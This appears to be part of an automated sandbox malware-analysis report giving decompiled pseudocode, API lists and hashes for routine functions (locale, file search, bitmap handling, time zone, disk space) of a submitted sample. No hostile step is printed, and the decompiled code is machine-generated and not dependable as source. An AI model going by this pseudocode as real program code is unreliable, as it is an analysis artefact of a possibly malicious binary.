                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                                                                                                            • Opcode ID: 7639f39f0f6971649c5501f16e778cfc29bd395630e8414492f684e078392d29
                                                                                                                                                                                                                            • Instruction ID: ab31158e8105cc555809865ed5eec4947da01a74a5557fb65747f91f9d9dccb4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7639f39f0f6971649c5501f16e778cfc29bd395630e8414492f684e078392d29
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6901FCB07043155BE731EB619D92BD6739CE758744F9200BBB744A61C1DBF86D40891D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040E088 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 46%
                                                                                                                                                                                                                            			E0040E088(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40e0ec);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E00404C30( &_v16, 7,  &_v11);
				_push(_v16);
				E00409664(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040E0F3);
				return E004049C0( &_v16);
			}








                                                                                                                                                                                                                            0x0040e088
                                                                                                                                                                                                                            0x0040e091
                                                                                                                                                                                                                            0x0040e096
                                                                                                                                                                                                                            0x0040e097
                                                                                                                                                                                                                            0x0040e09c
                                                                                                                                                                                                                            0x0040e09f
                                                                                                                                                                                                                            0x0040e0ae
                                                                                                                                                                                                                            0x0040e0be
                                                                                                                                                                                                                            0x0040e0c6
                                                                                                                                                                                                                            0x0040e0cf
                                                                                                                                                                                                                            0x0040e0d8
                                                                                                                                                                                                                            0x0040e0db
                                                                                                                                                                                                                            0x0040e0de
                                                                                                                                                                                                                            0x0040e0eb

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040E0EC), ref: 0040E0AE
                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040E0EC), ref: 0040E0C7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                            • Opcode ID: a1f457d7b3ffcdaaeee38bedc2788677392b62057e0918eed350879aa8eb83f3
                                                                                                                                                                                                                            • Instruction ID: 7c6682d932fdf235f30c9e422d46d0a378ce0b1a8e98ecff7cc19f77d6cd180e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1f457d7b3ffcdaaeee38bedc2788677392b62057e0918eed350879aa8eb83f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCF0F671E08308ABEB00EBB2C85298EB3AEE7C4714F50C97AB110A36C1DA7C65018659
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409B1C Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409B1C(void* __eax, WORD* __ecx, signed int __edx) {
				WORD* _t15;
				void* _t21;
				long _t22;

				_t15 = __ecx;
				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
				_t21 = FindFirstFileA(E00404E80(__eax), __ecx + 0x18);
				 *((intOrPtr*)(_t15 + 0x14)) = _t21;
				if(_t21 == 0xffffffff) {
					_t22 = GetLastError();
				} else {
					_t22 = E00409AB8(_t15);
					if(_t22 != 0) {
						E00409B90(_t15);
					}
				}
				return _t22;
			}






                                                                                                                                                                                                                            0x00409b1f
                                                                                                                                                                                                                            0x00409b28
                                                                                                                                                                                                                            0x00409b3c
                                                                                                                                                                                                                            0x00409b3e
                                                                                                                                                                                                                            0x00409b44
                                                                                                                                                                                                                            0x00409b61
                                                                                                                                                                                                                            0x00409b46
                                                                                                                                                                                                                            0x00409b4d
                                                                                                                                                                                                                            0x00409b51
                                                                                                                                                                                                                            0x00409b55
                                                                                                                                                                                                                            0x00409b55
                                                                                                                                                                                                                            0x00409b51
                                                                                                                                                                                                                            0x00409b68

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00473407,00000000,0047347E), ref: 00409B37
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,?,00473407,00000000,0047347E), ref: 00409B5C
                                                                                                                                                                                                                              • Part of subcall function 00409AB8: FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                                                              • Part of subcall function 00409AB8: FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                                                              • Part of subcall function 00409B90: FindClose.KERNEL32(?,?,00409B5A,00000000,?,?,?,?,00473407,00000000,0047347E), ref: 00409B9C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 976985129-0
                                                                                                                                                                                                                            • Opcode ID: 5173ca5de35eaf764c042a74d65f64b91b397c91c5c324bd22024a6cb50f54fd
                                                                                                                                                                                                                            • Instruction ID: 79fd7835e2b2924360e3ee9b5121bf30e16e58b6cc0e4d1406ffac342d6b08ee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5173ca5de35eaf764c042a74d65f64b91b397c91c5c324bd22024a6cb50f54fd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58E03962F0122007C7156A7E688159A65DC6A85778349037FF914FB3C7D63CEC0643E9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004601F0 Relevance: 1.8, APIs: 1, Instructions: 284COMMONCrypto
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                                                                            			E004601F0(intOrPtr* __eax) {
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				char _v17;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v356;
				intOrPtr _v368;
				void* _v372;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v412;
				intOrPtr _v420;
				intOrPtr _v440;
				void* _v476;
				char _v484;
				intOrPtr _v488;
				char _v492;
				intOrPtr _v496;
				char _v668;
				char _v684;
				void* __ebp;
				intOrPtr _t126;
				void* _t146;
				signed int _t162;
				void* _t166;
				intOrPtr _t176;
				signed int _t200;
				intOrPtr* _t237;
				char _t238;
				intOrPtr _t266;
				intOrPtr _t280;
				signed int _t293;
				void* _t294;
				void* _t297;
				void* _t299;
				intOrPtr _t300;

				_t297 = _t299;
				_t300 = _t299 + 0xfffffd58;
				_v8 = __eax;
				_t126 =  *((intOrPtr*)(_v8 + 0x2c));
				_v12 = _t126;
				if(_v12 != 0) {
					return _v12;
				} else {
					_t303 = _t126;
					if(_t126 == 0) {
						 *((intOrPtr*)(_v8 + 0x2c)) = E00429914(1);
					}
					_v12 =  *((intOrPtr*)(_v8 + 0x2c));
					_v17 = 1;
					E0045FA28(_v8,  &_v668, _t303);
					_push(_t297);
					_push(0x4605ea);
					_push( *[fs:edx]);
					 *[fs:edx] = _t300;
					_push(_t297);
					_push(0x4605bb);
					_push( *[fs:edx]);
					 *[fs:edx] = _t300;
					E0042AAE8( *((intOrPtr*)(_v8 + 0x2c)), 0);
					if( *((char*)(_v8 + 0x3e)) == 1) {
						L5:
						E0042AE8C( *((intOrPtr*)(_v8 + 0x2c)), 3);
					} else {
						_t305 = _v440 - 1;
						if(_v440 != 1) {
							E0042AE8C( *((intOrPtr*)(_v8 + 0x2c)), 6);
						} else {
							goto L5;
						}
					}
					_push(0);
					_push(0);
					E00419804(0, 0,  &_v684, 0);
					_push( &_v684);
					_push(0);
					_t240 = 0;
					E00403DE8(_v8, _t305);
					_push(_t297);
					_push(0x4605aa);
					_push( *[fs:edx]);
					 *[fs:edx] = _t300;
					_t146 =  *(_v8 + 0x38);
					if(_t146 != 0) {
						_t280 = _v8;
						_t307 =  *((char*)(_t280 + 0x3e)) - 1;
						if( *((char*)(_t280 + 0x3e)) != 1) {
							DeleteObject(_t146);
							__eflags = 0;
							 *(_v8 + 0x38) = 0;
						} else {
							E00460168( &_v484, _t146);
							E004296A4( *(_v8 + 0x38));
							_t240 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c))));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x38))();
							_v17 = 0;
						}
					}
					E004622B8( &_v484, _t240);
					_t237 =  *((intOrPtr*)(_v8 + 0x2c));
					E0042AAE8(_t237, 0);
					 *((intOrPtr*)( *_t237 + 0x40))();
					_t242 =  *_t237;
					 *((intOrPtr*)( *_t237 + 0x34))();
					_v16 = E0042A04C(_t237,  *_t237, 0, _t307);
					_t293 = E0042A04C(_t237,  *_t237, 1, _t307) - _v16;
					if(_t293 <= 0 || (_t293 & 0x00000003) != 0) {
						_t238 = 1;
					} else {
						_t238 = _v356;
					}
					if(_v420 != 0) {
						while(E00460E14( &_v484) != 2) {
							_v16 = E0042A04C( *((intOrPtr*)(_v8 + 0x2c)), _t242, 0, __eflags);
							while(1) {
								__eflags = _v344 - _v368;
								if(_v344 >= _v368) {
									break;
								}
								_t242 = _t238;
								_t200 = E00462440( &_v484, _t238,  &_v16);
								_t72 =  &_v16;
								 *_t72 = _v16 + _t293 * _t200;
								__eflags =  *_t72;
							}
							E004625DC( &_v484);
						}
						_v412 = _v496;
						_v396 = _v488;
						if(_v492 != 0) {
							_v392 = 0xffffffff;
							_v348 = 0;
						}
						E0046257C( &_v484, _v340);
						_v16 = E0042A04C( *((intOrPtr*)(_v8 + 0x2c)), _t242, 0, 0);
					}
					if(_v420 == 0 || _v492 != 0) {
						if(_v348 != 0) {
							_t318 = _v17;
							if(_v17 != 0) {
								E004600C0( &_v484);
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x38))();
								 *((char*)(_v8 + 0x22)) = 1;
								_v16 = E0042A04C( *((intOrPtr*)(_v8 + 0x2c)),  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))), 0, _t318);
							}
						}
					}
					while(_v344 < _v368) {
						_t162 = E00462440( &_v484, _t238,  &_v16);
						_t105 =  &_v16;
						 *_t105 = _v16 + _t293 * _t162;
						__eflags =  *_t105;
					}
					if(_v420 != 0) {
						E004625DC( &_v484);
					}
					E00460F28( &_v484);
					_pop(_t266);
					 *[fs:eax] = _t266;
					_push(0x4605b1);
					_t166 = E004027EC();
					_t321 = _t166;
					if(_t166 != 0) {
						_t294 = 0;
						__eflags = 0;
					} else {
						_t294 = 0x64;
					}
					_push(_t294);
					_push( *((intOrPtr*)(_v8 + 0x22)));
					E00419804(0, 0,  &_v684, 0);
					_push( &_v684);
					_push(0);
					E00403DE8(_v8, _t321);
					_t176 = _v8;
					if( *((char*)(_t176 + 0x22)) != 0) {
						return  *((intOrPtr*)( *_v8 + 0x10))();
					}
					return _t176;
				}
			}









































                                                                                                                                                                                                                            0x004601f1
                                                                                                                                                                                                                            0x004601f3
                                                                                                                                                                                                                            0x004601fc
                                                                                                                                                                                                                            0x00460202
                                                                                                                                                                                                                            0x00460205
                                                                                                                                                                                                                            0x0046020c
                                                                                                                                                                                                                            0x004605fa
                                                                                                                                                                                                                            0x00460212
                                                                                                                                                                                                                            0x00460212
                                                                                                                                                                                                                            0x00460214
                                                                                                                                                                                                                            0x00460225
                                                                                                                                                                                                                            0x00460225
                                                                                                                                                                                                                            0x0046022e
                                                                                                                                                                                                                            0x00460231
                                                                                                                                                                                                                            0x0046023e
                                                                                                                                                                                                                            0x00460245
                                                                                                                                                                                                                            0x00460246
                                                                                                                                                                                                                            0x0046024b
                                                                                                                                                                                                                            0x0046024e
                                                                                                                                                                                                                            0x00460253
                                                                                                                                                                                                                            0x00460254
                                                                                                                                                                                                                            0x00460259
                                                                                                                                                                                                                            0x0046025c
                                                                                                                                                                                                                            0x00460267
                                                                                                                                                                                                                            0x00460273
                                                                                                                                                                                                                            0x0046027e
                                                                                                                                                                                                                            0x00460286
                                                                                                                                                                                                                            0x00460275
                                                                                                                                                                                                                            0x00460275
                                                                                                                                                                                                                            0x0046027c
                                                                                                                                                                                                                            0x00460295
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046027c
                                                                                                                                                                                                                            0x0046029a
                                                                                                                                                                                                                            0x0046029c
                                                                                                                                                                                                                            0x004602ad
                                                                                                                                                                                                                            0x004602b8
                                                                                                                                                                                                                            0x004602b9
                                                                                                                                                                                                                            0x004602bb
                                                                                                                                                                                                                            0x004602c7
                                                                                                                                                                                                                            0x004602ce
                                                                                                                                                                                                                            0x004602cf
                                                                                                                                                                                                                            0x004602d4
                                                                                                                                                                                                                            0x004602d7
                                                                                                                                                                                                                            0x004602dd
                                                                                                                                                                                                                            0x004602e2
                                                                                                                                                                                                                            0x004602e4
                                                                                                                                                                                                                            0x004602e7
                                                                                                                                                                                                                            0x004602eb
                                                                                                                                                                                                                            0x00460319
                                                                                                                                                                                                                            0x00460321
                                                                                                                                                                                                                            0x00460323
                                                                                                                                                                                                                            0x004602ed
                                                                                                                                                                                                                            0x004602f5
                                                                                                                                                                                                                            0x00460300
                                                                                                                                                                                                                            0x0046030d
                                                                                                                                                                                                                            0x0046030f
                                                                                                                                                                                                                            0x00460312
                                                                                                                                                                                                                            0x00460312
                                                                                                                                                                                                                            0x004602eb
                                                                                                                                                                                                                            0x0046032c
                                                                                                                                                                                                                            0x00460334
                                                                                                                                                                                                                            0x0046033b
                                                                                                                                                                                                                            0x0046034a
                                                                                                                                                                                                                            0x00460355
                                                                                                                                                                                                                            0x00460357
                                                                                                                                                                                                                            0x00460363
                                                                                                                                                                                                                            0x00460374
                                                                                                                                                                                                                            0x00460379
                                                                                                                                                                                                                            0x0046038b
                                                                                                                                                                                                                            0x00460383
                                                                                                                                                                                                                            0x00460383
                                                                                                                                                                                                                            0x00460383
                                                                                                                                                                                                                            0x00460397
                                                                                                                                                                                                                            0x0046043f
                                                                                                                                                                                                                            0x00460409
                                                                                                                                                                                                                            0x00460426
                                                                                                                                                                                                                            0x0046042c
                                                                                                                                                                                                                            0x00460432
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00460417
                                                                                                                                                                                                                            0x00460419
                                                                                                                                                                                                                            0x00460423
                                                                                                                                                                                                                            0x00460423
                                                                                                                                                                                                                            0x00460423
                                                                                                                                                                                                                            0x00460423
                                                                                                                                                                                                                            0x0046043a
                                                                                                                                                                                                                            0x0046043a
                                                                                                                                                                                                                            0x00460459
                                                                                                                                                                                                                            0x00460465
                                                                                                                                                                                                                            0x00460472
                                                                                                                                                                                                                            0x00460474
                                                                                                                                                                                                                            0x00460480
                                                                                                                                                                                                                            0x00460480
                                                                                                                                                                                                                            0x00460492
                                                                                                                                                                                                                            0x004604a4
                                                                                                                                                                                                                            0x004604a4
                                                                                                                                                                                                                            0x004604ae
                                                                                                                                                                                                                            0x004604c0
                                                                                                                                                                                                                            0x004604c2
                                                                                                                                                                                                                            0x004604c6
                                                                                                                                                                                                                            0x004604ce
                                                                                                                                                                                                                            0x004604dd
                                                                                                                                                                                                                            0x004604e3
                                                                                                                                                                                                                            0x004604f4
                                                                                                                                                                                                                            0x004604f4
                                                                                                                                                                                                                            0x004604c6
                                                                                                                                                                                                                            0x004604c0
                                                                                                                                                                                                                            0x00460511
                                                                                                                                                                                                                            0x00460504
                                                                                                                                                                                                                            0x0046050e
                                                                                                                                                                                                                            0x0046050e
                                                                                                                                                                                                                            0x0046050e
                                                                                                                                                                                                                            0x0046050e
                                                                                                                                                                                                                            0x00460526
                                                                                                                                                                                                                            0x0046052e
                                                                                                                                                                                                                            0x0046052e
                                                                                                                                                                                                                            0x00460539
                                                                                                                                                                                                                            0x00460540
                                                                                                                                                                                                                            0x00460543
                                                                                                                                                                                                                            0x00460546
                                                                                                                                                                                                                            0x0046054b
                                                                                                                                                                                                                            0x00460550
                                                                                                                                                                                                                            0x00460552
                                                                                                                                                                                                                            0x0046055b
                                                                                                                                                                                                                            0x0046055b
                                                                                                                                                                                                                            0x00460554
                                                                                                                                                                                                                            0x00460554
                                                                                                                                                                                                                            0x00460554
                                                                                                                                                                                                                            0x0046055f
                                                                                                                                                                                                                            0x00460566
                                                                                                                                                                                                                            0x00460576
                                                                                                                                                                                                                            0x00460581
                                                                                                                                                                                                                            0x00460582
                                                                                                                                                                                                                            0x00460590
                                                                                                                                                                                                                            0x00460595
                                                                                                                                                                                                                            0x0046059c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004605a6
                                                                                                                                                                                                                            0x004605a9
                                                                                                                                                                                                                            0x004605a9

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0042AE8C: DeleteObject.GDI32(00000000), ref: 0042AFD3
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00460319
                                                                                                                                                                                                                              • Part of subcall function 004600C0: 73C9A8F0.GDI32(?,?,?,004604D3), ref: 00460159
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DeleteObject
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1531683806-0
                                                                                                                                                                                                                            • Opcode ID: f5af9fd06688819dce01de8b5de30438dcb52270282adaa96d37c89a3f1fecb9
                                                                                                                                                                                                                            • Instruction ID: 81a91d6be25e83a18400d4f463c807b98174f46c4b7671c237d37da0e720cfd9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5af9fd06688819dce01de8b5de30438dcb52270282adaa96d37c89a3f1fecb9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57C15C30A00118EFDB60DB69C984BDEB7F5AF49304F5081EAE805A7351EB789E85CF46
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047E020 Relevance: 1.6, APIs: 1, Instructions: 90timeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E0047E020(signed int __ebx, void* __ecx, void* __esi, long long __fp0) {
				long long _v12;
				struct _TIME_ZONE_INFORMATION _v184;
				char _v188;
				char _v192;
				void* _t29;
				intOrPtr _t30;
				void* _t48;
				void* _t49;
				intOrPtr _t51;
				signed int _t55;
				signed int _t66;
				void* _t70;
				intOrPtr _t71;
				void* _t78;
				long long _t86;

				_t86 = __fp0;
				_t55 = __ebx;
				_push(__ebx);
				_v192 = 0;
				_v188 = 0;
				_push(_t78);
				_push(0x47e133);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xffffff44;
				_t29 = GetTimeZoneInformation( &_v184) - 0xffffffff;
				if(_t29 == 0) {
					_t30 =  *0x49dde0; // 0x47a56c
					E00406A70(_t30,  &_v188);
					_t66 = 1;
					E0040D144(_v188, 1);
					E00404378();
				} else {
					_t48 = _t29 - 1;
					if(_t48 == 0) {
						_t55 = _v184.Bias;
					} else {
						_t49 = _t48 - 1;
						if(_t49 == 0) {
							_t55 = _v184.Bias + _v184.StandardBias;
						} else {
							_t83 = _t49 == 1;
							if(_t49 == 1) {
								_t55 = _v184.Bias + _v184.DaylightBias;
							} else {
								_t51 =  *0x49dde0; // 0x47a56c
								E00406A70(_t51,  &_v192);
								_t66 = 1;
								E0040D144(_v192, 1);
								E00404378();
							}
						}
					}
				}
				_push(0);
				asm("cdq");
				_t60 = (_t55 ^ _t66) - _t66;
				asm("cdq");
				_push(((_t55 ^ _t66) - _t66) % 0x3c);
				asm("cdq");
				asm("cdq");
				_pop(_t70);
				E0040AF70(_t60 / 0x3c, 0, _t70, _t83, _t86);
				_v12 = _t86;
				asm("wait");
				if(_t55 > 0) {
					_v12 =  *0x47e144 - _v12;
					asm("wait");
				}
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(0x47e13a);
				return E004049E4( &_v192, 2);
			}


















                                                                                                                                                                                                                            0x0047e020
                                                                                                                                                                                                                            0x0047e020
                                                                                                                                                                                                                            0x0047e029
                                                                                                                                                                                                                            0x0047e02d
                                                                                                                                                                                                                            0x0047e033
                                                                                                                                                                                                                            0x0047e03b
                                                                                                                                                                                                                            0x0047e03c
                                                                                                                                                                                                                            0x0047e041
                                                                                                                                                                                                                            0x0047e044
                                                                                                                                                                                                                            0x0047e053
                                                                                                                                                                                                                            0x0047e056
                                                                                                                                                                                                                            0x0047e069
                                                                                                                                                                                                                            0x0047e06e
                                                                                                                                                                                                                            0x0047e079
                                                                                                                                                                                                                            0x0047e080
                                                                                                                                                                                                                            0x0047e085
                                                                                                                                                                                                                            0x0047e058
                                                                                                                                                                                                                            0x0047e058
                                                                                                                                                                                                                            0x0047e059
                                                                                                                                                                                                                            0x0047e08c
                                                                                                                                                                                                                            0x0047e05b
                                                                                                                                                                                                                            0x0047e05b
                                                                                                                                                                                                                            0x0047e05c
                                                                                                                                                                                                                            0x0047e0a5
                                                                                                                                                                                                                            0x0047e05e
                                                                                                                                                                                                                            0x0047e05e
                                                                                                                                                                                                                            0x0047e05f
                                                                                                                                                                                                                            0x0047e09a
                                                                                                                                                                                                                            0x0047e061
                                                                                                                                                                                                                            0x0047e0b0
                                                                                                                                                                                                                            0x0047e0b5
                                                                                                                                                                                                                            0x0047e0c0
                                                                                                                                                                                                                            0x0047e0c7
                                                                                                                                                                                                                            0x0047e0cc
                                                                                                                                                                                                                            0x0047e0cc
                                                                                                                                                                                                                            0x0047e05f
                                                                                                                                                                                                                            0x0047e05c
                                                                                                                                                                                                                            0x0047e059
                                                                                                                                                                                                                            0x0047e0d1
                                                                                                                                                                                                                            0x0047e0d5
                                                                                                                                                                                                                            0x0047e0da
                                                                                                                                                                                                                            0x0047e0e3
                                                                                                                                                                                                                            0x0047e0e6
                                                                                                                                                                                                                            0x0047e0e9
                                                                                                                                                                                                                            0x0047e0f5
                                                                                                                                                                                                                            0x0047e0fa
                                                                                                                                                                                                                            0x0047e0fb
                                                                                                                                                                                                                            0x0047e100
                                                                                                                                                                                                                            0x0047e103
                                                                                                                                                                                                                            0x0047e106
                                                                                                                                                                                                                            0x0047e111
                                                                                                                                                                                                                            0x0047e114
                                                                                                                                                                                                                            0x0047e114
                                                                                                                                                                                                                            0x0047e117
                                                                                                                                                                                                                            0x0047e11a
                                                                                                                                                                                                                            0x0047e11d
                                                                                                                                                                                                                            0x0047e132

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,0047E133,?,?,?,?,0047DC8D,?,00000000,0047DCD5), ref: 0047E04E
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InformationLoadStringTimeZone
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2315373741-0
                                                                                                                                                                                                                            • Opcode ID: ceb2891f7d61990538c6f2e2e1a46ec860deeff2fc2c3279e0f8b5fdeb1ddd5e
                                                                                                                                                                                                                            • Instruction ID: c8d3901693a79c185cc961f03ab4e0d83d179c54252409d0c18e91a2dd9ec5b1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ceb2891f7d61990538c6f2e2e1a46ec860deeff2fc2c3279e0f8b5fdeb1ddd5e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A318670B043148BD714DF26DC81BA9B776EB48304F0482FAE50DE3291DB799D54CB1A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409ED2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409ED2(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E004059A0(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E004059A0(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

















                                                                                                                                                                                                                            0x00409edb
                                                                                                                                                                                                                            0x00409ee0
                                                                                                                                                                                                                            0x00409ee2
                                                                                                                                                                                                                            0x00409ee2
                                                                                                                                                                                                                            0x00409ef5
                                                                                                                                                                                                                            0x00409f04
                                                                                                                                                                                                                            0x00409f07
                                                                                                                                                                                                                            0x00409f14
                                                                                                                                                                                                                            0x00409f17
                                                                                                                                                                                                                            0x00409f1c
                                                                                                                                                                                                                            0x00409f1f
                                                                                                                                                                                                                            0x00409f21
                                                                                                                                                                                                                            0x00409f2e
                                                                                                                                                                                                                            0x00409f31
                                                                                                                                                                                                                            0x00409f36
